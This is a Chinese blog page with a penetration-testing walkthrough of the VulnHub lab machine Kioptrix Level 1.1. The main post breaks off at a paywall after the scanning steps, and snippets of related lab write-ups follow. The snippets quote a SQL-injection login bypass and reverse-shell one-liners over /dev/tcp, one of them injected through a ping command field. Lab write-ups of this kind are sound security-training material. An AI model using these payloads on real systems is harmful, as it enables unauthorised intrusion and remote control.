vulnhub Kioptrix: Level 1.1 (#2)

最新推荐文章于 2025-01-13 17:51:03 发布
原创 最新推荐文章于 2025-01-13 17:51:03 发布 · 2.8k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#getshell #vulnhub #RCE #反弹shell #提权

本文介绍了一种针对特定靶机的渗透测试过程,包括使用万能密码登录、远程命令执行获取shell及利用系统版本漏洞提权等关键技术环节。

写在前面:

据靶机描述,这个靶机有不止一种攻击链,本仙女不才,只找到一种。

本文的攻击路径是:端口扫描-->万能密码web登录-->RCE获得反弹shell-->系统版本漏洞提权

具体操作:

步骤1:arp-scan确认靶机ip

输入命令(具体ip段根据实际情况)

sudo arp-scan 192.168.101.1/24

得到网段所有在线设备ip和MAC地址,根据靶机网络配置中显示的MAC地址,可以确定靶机ip为192.168.101.23

步骤2:nmap端口扫描

输入如下命令,得到靶机开放端口和对应服务信息

sudo nmap -sS -A -p 1-10000 192.168.101.23

上图比较有价值的信息是:

(1)80端口开放,web服务器是apache,版本是2.0.52

(2)3306端口开放,数据库是mysql

(3)综合以上两点,网站后台语言很可能是php

目前的思路:

(1)看看apache 2.0.52有没有可以直接利用getshell的漏洞

(2)访问80端口看看有没有可以利用的漏洞

步骤3:nikto扫描

输入命令


                

        

    


  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇

				
			

			

				

					qq_27466929的博客
				

				

					08-25
					
					1060
					
				

			

		

		

			
				
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1

			
		

	



                

            
              



	

		

			

				
					
KIOPTRIX: LEVEL 1.1 (#2)

				
			

			

				

					logan_logan的博客
				

				

					12-19
					
					281
					
				

			

		

		

			
				
KIOPTRIX: LEVEL 1.1 (#2)
1.在浏览器输入地址,打开网页发现是一个登录框;接下来进行信息收集;

2.信息收集
2.1端口扫描
使用nmap工具发现可以枚举很多的端口,后面因为找到了其它漏洞就没有进行尝试;

2.2目录枚举
使用gobuster工具进行枚举,但是没有什么帮助;

3.漏洞探测
3.1 登录框存在sql注入漏洞,使用万能密码 admin’ or’1’=’1可以登录;


3.2 对登录之后的界面进行探测的时候发现存在命令注入漏洞;


4.漏洞利用
4.1 反弹she

			
		

	



              


  
              

                


	

		

			

				
					
oscp——Kioptrix: Level 1.1 (#2)

				
			

			

				

					王嘟嘟的博客
				

				

					02-20
					
					1430
					
				

			

		

		

			
				
0x00 前言
第三十二台机子
0x01 信息收集


0x02 Web80-webshell
访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码

成功进入后台,可以看到是一个执行ping命令的执行窗口

这里反弹一下shell,这里使用
bash -i >& /dev/tcp/192.168.0.111/1234 >&1


然后在/...

			
		

	





	

		

			

				
					
Vulhub靶场-KIOPTRIX: LEVEL 1.1

				
			

			

				

					B_l_a_nk的博客
				

				

					11-19
					
					656
					
				

			

		

		

			
				
万能秘密,命令执行,内核漏洞

			
		

	



		

			
		



	

		

			

				
					
Kioptrix: Level 1.1 (#2)

				
			

			

				

					战神/calmness的博客
				

				

					06-04
					
					1162
					
				

			

		

		

			
				
下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/



目标机器:192.168.243.147

攻击机器:192.168.210.134

目录

信息收集

万能和密码破解

命令执行

反弹shell

监听

 版本内核 linux 2.6.9



信息收集


PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (proto...

			
		

	





	

		

			

          精选资源
				
					
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)

				
			

			

				

					01-09
				

			

		

		

			
				
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3)  文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...

			
		

	





	

		

			

				
					
Vulnhub靶机:Kioptrix_Level1.1

				
			

			

				

					qq_48904485的博客
				

				

					03-13
					
					630
					
				

			

		

		

			
				
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1.1192.168.56.104)目标:获取靶机root限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

			
		

	





	

		

			

				
					
Vulnhub靶场 Kioptrix: Level 1.1 (#2) 练习

					
最新发布

				
			

			

				

					Reset
				

				

					01-13
					
					925
					
				

			

		

		

			
				
netdiscover探测目标主机ip。nmap探测开放的端口和服务。扫描站点目录。从站点查看相关组件的版本信息。利用万能密码进行SQL注入登录到后台。发现系统命令执行功能点。利用系统命令执行功能点进行反弹shell。查看系统版本,centos 4.5。利用系统内核漏洞进行

			
		

	





	

		

			

				
					
Kioptrix: Level 1.1 (#2) -VulnHub靶机学习记录

				
			

			

				

					weixin_45509443的博客
				

				

					06-19
					
					555
					
				

			

		

		

			
				
环境:靶机:192.168.1.107 kali:192.168.106

主机发现



端口扫描



浏览器登录80端口,发现登录页面,尝试sql注入绕过密码登录



成功进入,经典ping命令,存在命令执行





kali 开启监听,nc -lvp 6666, 靶机执行命令:127.0.0.1&bash -i >& /dev/tcp/192.168.1.106/6666 0>&1,反弹shell到kali攻击机



成功反弹但不是root限,开始...

			
		

	





	

		

			

				
					
红队打靶练:KIOPTRIX: LEVEL 1.1 (#2)

				
			

			

				

					分享
				

				

					12-16
					
					565
					
				

			

		

		

			
				
红队打靶练:KIOPTRIX: LEVEL 1.1 (#2)   ,犹如狼群围猎般的紧张感.....

			
		

	





	

		

			

				
					
Kioptrix_Level_1

				
			

			

				

					12-30
				

			

		

		

			
				
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

			
		

	





	

		

			

				
					
Vulnhub-靶机-Kioptrix: Level 1.1 (#2)

				
			

			

				

					qq_43264813的博客
				

				

					01-28
					
					555
					
				

			

		

		

			
				
Vulnhub—靶机—Kioptrix: Level 1.1 (#2)
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
文章目录Vulnhub—靶机—Kioptrix: Level 1.1 (#2)一、信息收集二、漏洞利用三、Flag
一、信息收集
【步骤一】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV

			
		

	





	

		

			

				
					
vulnhub 靶机 Kioptrix Level 1渗透笔记

				
			

			

				

					weixin_52268949的博客
				

				

					03-03
					
					5605
					
				

			

		

		

			
				
靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
kali ip

信息收集
先使用nmap收集目标的ip地址
nmap -sP 192.168.101.0/24


扫描开放端口
nmap -A -p- 192.168.101.20


这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本
msfconsole
msf6 > use auxiliary/scanner/smb/smb_version    

			
		

	





	

		

			

				
					
VulnHub——Kioptrix Level 1

				
			

			

				

					江左盟的博客
				

				

					04-18
					
					728
					
				

			

		

		

			
				
简介



信息收集

使用fping -agq 192.168.204.0/24探测局域网内其它主机,发现存在其它3台主机,如图:



使用nmap --min-rate 10000 -T5 192.168.0.102 192.168.0.100 192.168.0.126快速扫描这三台主机,发现只有一台是VMware,且开启了22,80,111,139,443和1024端口,如图:



...

			
		

	





	

		

			

				
					
VulnHub——Kioptrix Level 3

				
			

			

				

					江左盟的博客
				

				

					05-28
					
					3223
					
				

			

		

		

			
				
目录

简介

信息收集

漏洞检测与利用

升

总结

简介

该靶机还是一如既往的简单,通过信息收集发现Web服务使用LotusCMS,使用Google搜索发现存在已知漏洞,通过漏洞利用脚本获得webshell,然后通过内核漏洞直接限到root。

信息收集

探测目标主机IP地址,如图:



然后对目标主机进行快速端口扫描,发现开启22和80端口,OpenSSH版本4.7p1,Apache版本2.2.8,PHP版本5.2.4-2,操作系统可能为Debian或Ubuntu,内核版本为2.

			
		

	





	

		

			

				
					
VulnHub——Kioptrix Level 4

				
			

			

				

					江左盟的博客
				

				

					06-17
					
					2214
					
				

			

		

		

			
				
简介

该靶机较前面三个麻烦些, 需要新建虚拟机,将虚拟磁盘导入。

环境配置

从官网下载压缩文件,解压后发现只有vmdk文件(虚拟磁盘文件),没有vmdx文件,因此需要新建虚拟机,选择自定义模式,安装来源选择“稍后安装”,然后在客户机操作系统选择“其他”,如图:



然后选择位置为解压后放置vmdk文件的文件夹,名称自定义,如图:



出现示后点“继续”,设置内存为512M,如图:



然后一路默认,在选择磁盘处选择“使用现有虚拟磁盘”,然后选择vmdk文件,如图:



出现示后选择“保持现

			
		

	





	

		

			

				
					
Vulnhub靶机渗透-Kioptrix_Level_1

				
			

			

				

					XYZCG的博客
				

				

					12-14
					
					667
					
				

			

		

		

			
				
通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)

			
		

	





	

		

			

				
					
oscp——Kioptrix: Level 1 (#1)

				
			

			

				

					王嘟嘟的博客
				

				

					01-31
					
					1284
					
				

			

		

		

			
				
0x00 前言
这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下
链接
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
0x01 信息收集
1.IP

2.端口

0x02 攻击
1.端口
这里可以看到80端口开放了OpenSSL
使用nikto进行扫描(我记得oscp考试貌似不让使用工具)
nikto -host 192....

			
		

	





	

		

			

				
					
vulnhub靶机--Kioptrix_LV1

				
			

			

				

					qq_63233616的博客
				

				

					01-11
					
					525
					
				

			

		

		

			
				
简单解题

			
		

	





	

		

			

				
					
Kioptrix Level 1.2 (#3)靶机攻破:信息收集与

				
			

			

				

					
				

			

		

		

			
				
"Kioptrix: Level 1.2 (#3) 是一款Vulnhub靶机,用于网络安全和渗透测试练习。靶机IP为192.168.190.189,需配置host指向kioptrix3.com。攻破靶机涉及信息收集、漏洞利用、GETShell以及等技能,主要工具包括dirb...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  

	
    

      

      

      

        
        

          
          

            

              成就一亿技术人!
            

            

              拼手气红包6.0元
            

          

        

        

          

            还能输入1000个字符
          

          

             
          

          

            

              红包
              添加红包
            

            

              表情包
              插入表情
              

                

              

            

            

              表情包
              代码片
              

                
              

            

            

              
              
              
              
              
              
              
            

          

        

      

    

		

			

			

			

					 条评论被折叠 查看
			

			

				
			

		

	

	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值